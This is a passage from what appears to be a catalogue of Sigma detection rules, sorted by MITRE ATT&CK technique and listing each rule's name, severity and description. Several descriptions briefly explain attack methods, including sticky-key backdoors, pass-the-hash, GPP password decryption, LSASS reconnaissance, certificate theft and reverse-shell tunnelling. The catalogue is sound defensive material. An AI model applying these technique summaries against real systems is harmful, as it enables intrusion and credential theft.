    Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges
attack.t1110.003 8
  • Password Spraying via Explicit Credentials - Level: medium
    Description: Detects a single user failing to authenticate to multiple users using explicit credentials.
  • Multiple Users Failing to Authenticate from Single Process - Level: medium
    Description: Detects failed logins with multiple accounts from a single process on the system.
  • Valid Users Failing to Authenticate From Single Source Using Kerberos - Level: medium
    Description: Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.
  • Disabled Users Failing To Authenticate From Source Using Kerberos - Level: medium
    Description: Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.
  • Invalid Users Failing To Authenticate From Source Using Kerberos - Level: medium
    Description: Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.
  • Valid Users Failing to Authenticate from Single Source Using NTLM - Level: medium
    Description: Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.
  • Invalid Users Failing To Authenticate From Single Source Using NTLM - Level: medium
    Description: Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.
  • Multiple Users Remotely Failing To Authenticate From Single Source - Level: medium
    Description: Detects a source system failing to authenticate against a remote host with multiple users.
attack.t1567.001 7
  • Microsoft Binary Github Communication - Level: high
    Description: Detects an executable in the Windows folder accessing github.com
  • Network Connection Initiated To BTunnels Domains - Level: medium
    Description: Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Network Connection Initiated To Cloudflared Tunnels Domains - Level: medium
    Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Network Connection Initiated To DevTunnels Domain - Level: medium
    Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Network Connection Initiated To Mega.nz - Level: low
    Description: Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
  • Process Initiated Network Connection To Ngrok Domain - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
  • Network Connection Initiated To Visual Studio Code Tunnels Domain - Level: medium
    Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
attack.t1098.003 7
  • User Added to an Administrator's Azure AD Role - Level: medium
    Description: User Added to an Administrator's Azure AD Role
  • Granting Of Permissions To An Account - Level: medium
    Description: Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.
  • App Granted Privileged Delegated Or App Permissions - Level: high
    Description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
  • App Assigned To Azure RBAC/Microsoft Entra Role - Level: medium
    Description: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
  • Google Workspace Application Access Level Modified - Level: medium
    Description: Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing the Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources.
  • Github Outside Collaborator Detected - Level: medium
    Description: Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
  • Okta Admin Role Assigned to an User or Group - Level: medium
    Description: Detects when the Administrator role is assigned to a user or group.
attack.t1053.003 7
  • Azure Kubernetes CronJob - Level: medium
    Description: Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
  • Modifying Crontab - Level: medium
    Description: Detects suspicious modification of crontab file.
  • Persistence Via Sudoers Files - Level: medium
    Description: Detects creation of a sudoers file or files in the "sudoers.d" directory, which can be used as a potential method to persist privileges for a specific user.
  • Persistence Via Cron Files - Level: medium
    Description: Detects creation of a cron file or files in cron directories, which could indicate potential persistence.
  • Triple Cross eBPF Rootkit Default Persistence - Level: high
    Description: Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, which are both related to the TripleCross persistence method
  • Scheduled Cron Task/Job - Linux - Level: medium
    Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
  • Scheduled Cron Task/Job - MacOs - Level: medium
    Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
attack.t1070.003 7
  • Linux Command History Tampering - Level: high
    Description: Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
  • Cisco Clear Logs - Level: high
    Description: Detects clearing of the command history on a network OS, which is used for defense evasion
  • Clear PowerShell History - PowerShell Module - Level: medium
    Description: Detects keywords that could indicate clearing PowerShell history
  • Clearing Windows Console History - Level: high
    Description: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
  • Clear PowerShell History - PowerShell - Level: medium
    Description: Detects keywords that could indicate clearing PowerShell history
  • Disable Powershell Command History - Level: high
    Description: Detects scripts or commands that disable the PowerShell command history by removing the PSReadline module
  • Suspicious IO.FileStream - Level: medium
    Description: Detects opening a handle on the drive volume via the \\.\ DOS device path specifier and performing a direct-access read of the first few bytes of the volume.
attack.t1059.002 7
  • MacOS Scripting Interpreter AppleScript - Level: medium
    Description: Detects execution of the macOS scripting language AppleScript.
  • Clipboard Data Collection Via OSAScript - Level: high
    Description: Detects possible collection of data from the clipboard via execution of the osascript binary
  • JXA In-memory Execution Via OSAScript - Level: high
    Description: Detects possible malicious execution of JXA in-memory via OSAScript
  • Suspicious Microsoft Office Child Process - MacOS - Level: high
    Description: Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution
  • OSACompile Run-Only Execution - Level: high
    Description: Detects potential suspicious run-only executions compiled using OSACompile
  • Osacompile Execution By Potentially Suspicious Applet/Osascript - Level: medium
    Description: Detects potential suspicious applet or osascript executing "osacompile".
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
attack.t1552.004 7
  • Cisco Crypto Commands - Level: high
    Description: Detects when private keys are being exported from the device, or when new certificates are installed
  • DPAPI Backup Keys And Certificate Export Activity IOC - Level: high
    Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
  • Suspicious PFX File Creation - Level: medium
    Description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
  • Certificate Exported Via PowerShell - ScriptBlock - Level: medium
    Description: Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
  • Certificate Exported Via PowerShell - Level: medium
    Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
  • PowerShell Get-Process LSASS - Level: high
    Description: Detects a "Get-Process" cmdlet and its aliases on the lsass process, which is in almost all cases a sign of malicious activity
  • Private Keys Reconnaissance Via CommandLine Tools - Level: medium
    Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials
attack.t1557.001 7
  • Potential PetitPotam Attack Via EFS RPC Calls - Level: medium
    Description: Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. The usage of this RPC function should be rare, if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the source IP. Logs from the source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.
  • RottenPotato Like Attack Pattern - Level: high
    Description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like
  • Local Privilege Escalation Indicator TabTip - Level: high
    Description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
  • WinDivert Driver Load - Level: high
    Description: Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
  • HackTool - ADCSPwn Execution - Level: high
    Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service
  • HackTool - Impacket Tools Execution - Level: high
    Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
  • Potential SMB Relay Attack Tool Execution - Level: critical
    Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
attack.t1218.003 7
  • DLL Loaded From Suspicious Location Via Cmstp.EXE - Level: high
    Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
  • Outbound Network Connection Initiated By Cmstp.EXE - Level: high
    Description: Detects a network connection initiated by Cmstp.EXE. It's uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP Execution Process Creation - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Bypass UAC via CMSTP - Level: high
    Description: Detects command line usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • CMSTP Execution Registry Event - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
attack.t1546.008 7
  • Potential Privilege Escalation Using Symlink Between Osk and Cmd - Level: high
    Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
  • Persistence Via Sticky Key Backdoor - Level: critical
    Description: By replacing the sticky keys executable with the local admin's CMD executable, an attacker is able to access a privileged Windows console session without authenticating to the system. When the sticky keys are "activated", the privileged shell is launched.
  • Sticky Key Like Backdoor Execution - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
  • Suspicious Debugger Registration Cmdline - Level: high
    Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Potential Windows Defender Tampering Via Wmic.EXE - Level: high
    Description: Detects potential tampering with Windows Defender settings, such as adding exclusions using wmic
  • Sticky Key Like Backdoor Usage - Registry - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
attack.t1078.003 6
  • User Added To Admin Group - MacOS - Level: medium
    Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
  • User Added To Admin Group Via Dscl - Level: medium
    Description: Detects attempts to create and add an account to the admin group via "dscl"
  • User Added To Admin Group Via DseditGroup - Level: medium
    Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
  • Root Account Enable Via Dsenableroot - Level: medium
    Description: Detects attempts to enable the root account via "dsenableroot"
  • User Added To Admin Group Via Sysadminctl - Level: medium
    Description: Detects attempts to create and add an account to the admin group via "sysadminctl"
  • Admin User Remote Logon - Level: low
    Description: Detects remote login by the Administrator user (depending on internal pattern).
attack.t1565.001 6
  • Azure Device or Configuration Modified or Deleted - Level: medium
    Description: Identifies when a device or device configuration in Azure is modified or deleted.
  • Azure DNS Zone Modified or Deleted - Level: medium
    Description: Identifies when DNS zone is modified or deleted.
  • Commands to Clear or Remove the Syslog - Builtin - Level: high
    Description: Detects specific commands commonly used to remove or empty the syslog
  • History File Deletion - Level: high
    Description: Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity
  • Potential Suspicious Change To Sensitive/Critical Files - Level: medium
    Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on a Linux system.
  • Cisco Denial of Service - Level: medium
    Description: Detects a system being shut down or put into a different boot mode
attack.t1070.006 6
  • File Time Attribute Change - Linux - Level: medium
    Description: Detects file time attribute changes used to hide new files or changes to existing files.
  • Touch Suspicious Service File - Level: medium
    Description: Detects usage of the "touch" process on service files.
  • File Time Attribute Change - Level: medium
    Description: Detects file time attribute changes used to hide new files or changes to existing files
  • Unauthorized System Time Modification - Level: low
    Description: Detects scenarios where a potentially unauthorized application or user is modifying the system time.
  • File Creation Date Changed to Another Year - Level: high
    Description: Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
  • Powershell Timestomp - Level: medium
    Description: Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
attack.t1550.002 6
  • NTLM Logon - Level: low
    Description: Detects logons using NTLM, which could be caused by a legacy source or attackers
  • Hacktool Ruler - Level: high
    Description: Detects events that are generated when using the hacktool Ruler by Sensepost
  • Successful Overpass the Hash Attempt - Level: high
    Description: Detects a successful logon with logon type 9 (NewCredentials), which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module.
  • Pass the Hash Activity 2 - Level: medium
    Description: Detects the attack technique pass the hash which is used to move laterally inside the network
  • NTLMv1 Logon Between Client and Server - Level: medium
    Description: Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.
  • Potential Pass the Hash Activity - Level: medium
    Description: Detects the attack technique pass the hash which is used to move laterally inside the network
attack.t1090.001 6
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • Cloudflared Portable Execution - Level: medium
    Description: Detects the execution of the "cloudflared" binary from a non standard location.
  • Cloudflared Quick Tunnel Execution - Level: medium
    Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.
  • HackTool - SharpChisel Execution - Level: high
    Description: Detects usage of the Sharp Chisel via the commandline arguments
  • PUA - Chisel Tunneling Tool Execution - Level: high
    Description: Detects usage of the Chisel tunneling tool via the commandline arguments
  • Renamed Cloudflared.EXE Execution - Level: high
    Description: Detects the execution of a renamed "cloudflared" binary.
attack.t1552.006 6
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications - Level: medium
    Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
  • Findstr GPP Passwords - Level: high
    Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
  • LSASS Process Reconnaissance Via Findstr.EXE - Level: high
    Description: Detects findstr commands that include the keyword lsass, which indicates recon activity for the LSASS process PID
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE - Level: medium
    Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
  • Suspicious SYSVOL Domain Group Policy Access - Level: medium
    Description: Detects Access to Domain Group Policies stored in SYSVOL
  • Access To Sysvol Policies Share By Uncommon Process - Level: medium
    Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
attack.t1027.004 6
  • Dynamic CSharp Compile Artefact - Level: low
    Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution
  • Dynamic .NET Compilation Via Csc.EXE - Level: medium
    Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • Potential Application Whitelisting Bypass via Dnx.EXE - Level: medium
    Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
  • Visual Basic Command Line Compiler Usage - Level: high
    Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
  • Dynamic .NET Compilation Via Csc.EXE - Hunting - Level: medium
    Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
attack.t1218.001 6
  • HH.EXE Execution - Level: low
    Description: Detects the execution of "hh.exe" to open ".chm" files.
  • Remote CHM File Download/Execution Via HH.EXE - Level: high
    Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • OneNote.EXE Execution of Malicious Embedded Scripts - Level: high
    Description: Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
  • HH.EXE Initiated HTTP Network Connection - Level: medium
    Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
attack.t1546.011 6
  • Potential Shim Database Persistence via Sdbinst.EXE - Level: medium
    Description: Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
  • Uncommon Extension Shim Database Installation Via Sdbinst.EXE - Level: medium
    Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
  • Potential Persistence Via AppCompat RegisterAppRestart Layer - Level: medium
    Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.
  • Suspicious Shim Database Patching Activity - Level: high
    Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
  • Potential Persistence Via Shim Database In Uncommon Location - Level: high
    Description: Detects the installation of a new shim database where the file is located in a non-default location
  • Potential Persistence Via Shim Database Modification - Level: medium
    Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
attack.t1564.002 5
  • User Account Hidden By Registry - Level: high
    Description: Detects a modification for a specific user that prevents that user from being listed on the logon screen
  • Hidden User Creation - Level: medium
    Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine - Level: medium
    Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Hiding User Account Via SpecialAccounts Registry Key - Level: high
    Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen.
attack.t1213.003 5
  • Bitbucket Full Data Export Triggered - Level: high
    Description: Detects when full data export is attempted.
  • Bitbucket Unauthorized Full Data Export Triggered - Level: critical
    Description: Detects when a full data export is attempted by an unauthorized user.
  • Github Delete Action Invoked - Level: medium
    Description: Detects delete action in the Github audit logs for codespaces, environment, project and repo.
  • Github Outside Collaborator Detected - Level: medium
    Description: Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
  • Github Self Hosted Runner Changes Detected - Level: low
    Description: A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, self-hosted runner configuration changes should be validated from the GitHub UI, because the log entry may not provide full context.
attack.t1562.006 5
  • Okta User Session Start Via An Anonymising Proxy Service - Level: high
    Description: Detects when an Okta user session starts where the user is behind an anonymising proxy service.
  • Auditing Configuration Changes on Linux Host - Level: high
    Description: Detects changes to auditd configuration files
  • Logging Configuration Changes on Linux Host - Level: high
    Description: Detects changes to syslog daemon configuration files
  • Disable of ETW Trace - Powershell - Level: high
    Description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
  • ETW Trace Evasion Activity - Level: high
    Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
attack.t1027.003 5
  • Steganography Hide Zip Information in Picture File - Level: low
    Description: Detects appending of a zip file to an image file
  • Steganography Hide Files with Steghide - Level: low
    Description: Detects embedding of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.
  • Steganography Extract Files with Steghide - Level: low
    Description: Detects extraction of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.
  • Steganography Unzip Hidden Information From Picture File - Level: low
    Description: Detects extraction of a zip file from an image file
  • Findstr Launching .lnk File - Level: medium
    Description: Detects usage of findstr to identify and execute a .lnk file, as seen in the HHS redirect attack
attack.t1505.004 5
  • ETW Logging/Processing Option Disabled On IIS Server - Level: medium
    Description: Detects changes to the IIS server configuration in order to disable/remove the ETW logging/processing option.
  • HTTP Logging Disabled On IIS Server - Level: high
    Description: Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests.
  • New Module Module Added To IIS Server - Level: medium
    Description: Detects the addition of a new module to an IIS server.
  • Previously Installed IIS Module Was Removed - Level: low
    Description: Detects the removal of a previously installed IIS module.
  • Suspicious IIS Module Registration - Level: high
    Description: Detects a suspicious IIS module registration as described in the Microsoft threat report on IIS backdoors
attack.t1218.009 4
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • RegAsm.EXE Initiating Network Connection To Public IP - Level: medium
    Description: Detects "RegAsm.exe" initiating a network connection to public IP addresses
  • Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension - Level: medium
    Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
  • Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location - Level: medium
    Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
attack.t1552.007 4
  • Kubernetes Admission Controller Modification - Level: medium
    Description: Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
  • Kubernetes Secrets Enumeration - Level: low
    Description: Detects enumeration of Kubernetes secrets.
  • Azure Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Google Cloud Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
attack.t1550.001 4
  • AWS Console GetSigninToken Potential Abuse - Level: medium
    Description: Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request.
  • AWS STS AssumeRole Misuse - Level: low
    Description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
  • AWS STS GetSessionToken Misuse - Level: low
    Description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
attack.t1136.003 4
  • AWS ElastiCache Security Group Created - Level: low
    Description: Detects when an ElastiCache security group has been created.
  • New Github Organization Member Added - Level: informational
    Description: Detects when a new member is added or invited to a github organization.
  • New Federated Domain Added - Level: medium
    Description: Detects the addition of a new Federated Domain.
  • New Federated Domain Added - Exchange - Level: medium
    Description: Detects the addition of a new Federated Domain.
attack.t1021.004 4
  • Bitbucket Global SSH Settings Changed - Level: medium
    Description: Detects Bitbucket global SSH access configuration changes.
  • Bitbucket User Login Failure Via SSH - Level: medium
    Description: Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.
  • OpenSSH Server Listening On Socket - Level: medium
    Description: Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket.
  • Port Forwarding Activity Via SSH.EXE - Level: medium
    Description: Detects port forwarding activity via SSH.exe
attack.t1222.002 4
  • Remove Immutable File Attribute - Auditd - Level: medium
    Description: Detects removal of the immutable file attribute.
  • File or Folder Permissions Change - Level: low
    Description: Detects file and folder permission changes.
  • Remove Immutable File Attribute - Level: medium
    Description: Detects usage of the 'chattr' utility to remove the immutable file attribute.
  • Chmod Suspicious Directory - Level: medium
    Description: Detects chmod targeting files in abnormal directory paths.
attack.t1102.001 4
  • PwnDrp Access - Level: critical
    Description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
  • Raw Paste Service Access - Level: high
    Description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process - Level: medium
    Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
  • New Connection Initiated To Potential Dead Drop Resolver Domain - Level: high
    Description: Detects an executable that is not an internet browser or known application initiating network connections to legitimate popular websites which have been used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. in order to pass through undetected.
attack.t1222.001 4
  • AD Object WriteDAC Access - Level: critical
    Description: Detects WRITE_DAC access to a domain object
  • Suspicious Recursive Takeown - Level: medium
    Description: Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant adversaries higher permissions on specific files and folders
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • File or Folder Permissions Modifications - Level: medium
    Description: Detects a file or folder's permissions being modified or tampered with.
attack.t1547.009 4
  • Windows Network Access Suspicious desktop.ini Action - Level: medium
    Description: Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
  • New Custom Shim Database Created - Level: medium
    Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
  • Creation Exe for Service with Unquoted Path - Level: high
    Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
  • Suspicious desktop.ini Action - Level: medium
    Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
attack.t1552.002 4
  • SAM Registry Hive Handle Request - Level: high
    Description: Detects handles requested to SAM registry hive
  • Enumeration for 3rd Party Creds From CLI - Level: medium
    Description: Detects processes that query known 3rd party registry keys that hold credentials via the command line
  • Enumeration for Credentials in Registry - Level: medium
    Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Detects remote registry management using the REG utility from a non-admin workstation
attack.t1027.005 4
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
  • HackTool - CrackMapExec PowerShell Obfuscation - Level: high
    Description: The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings that are detected by this rule.
  • PUA - DefenderCheck Execution - Level: high
    Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
attack.t1484.001 4
  • Group Policy Abuse for Privilege Addition - Level: medium
